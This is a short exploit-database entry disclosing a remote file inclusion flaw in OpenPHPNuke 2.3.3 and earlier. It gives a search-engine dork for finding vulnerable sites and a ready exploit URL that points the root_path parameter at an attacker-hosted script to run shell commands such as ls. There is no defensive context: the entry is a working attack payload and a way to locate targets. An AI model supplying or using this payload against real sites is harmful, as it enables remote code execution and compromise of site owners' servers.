id: 390
date: 04/28/2006
title: OpenPHPNuke <= 2.3.3 Remote File Inclusion Vulnerability
author: [Oo]
cves: 

========================================================
OpenPHPNuke <= 2.3.3 Remote File Inclusion Vulnerability
========================================================




Title: OpenPHPNuke <= 2.3.3 Remote File Inclusion
URL: http://www.openphpnuke.com/
Dork: inurl:/system/article/alltopics.php OR inurl:/system/user/index.php
Credits: [Oo]

Exploit: /master.php?root_path=http://yourhost/cmd.gif?cmd=ls



#  0day.today [2023-03-26]  #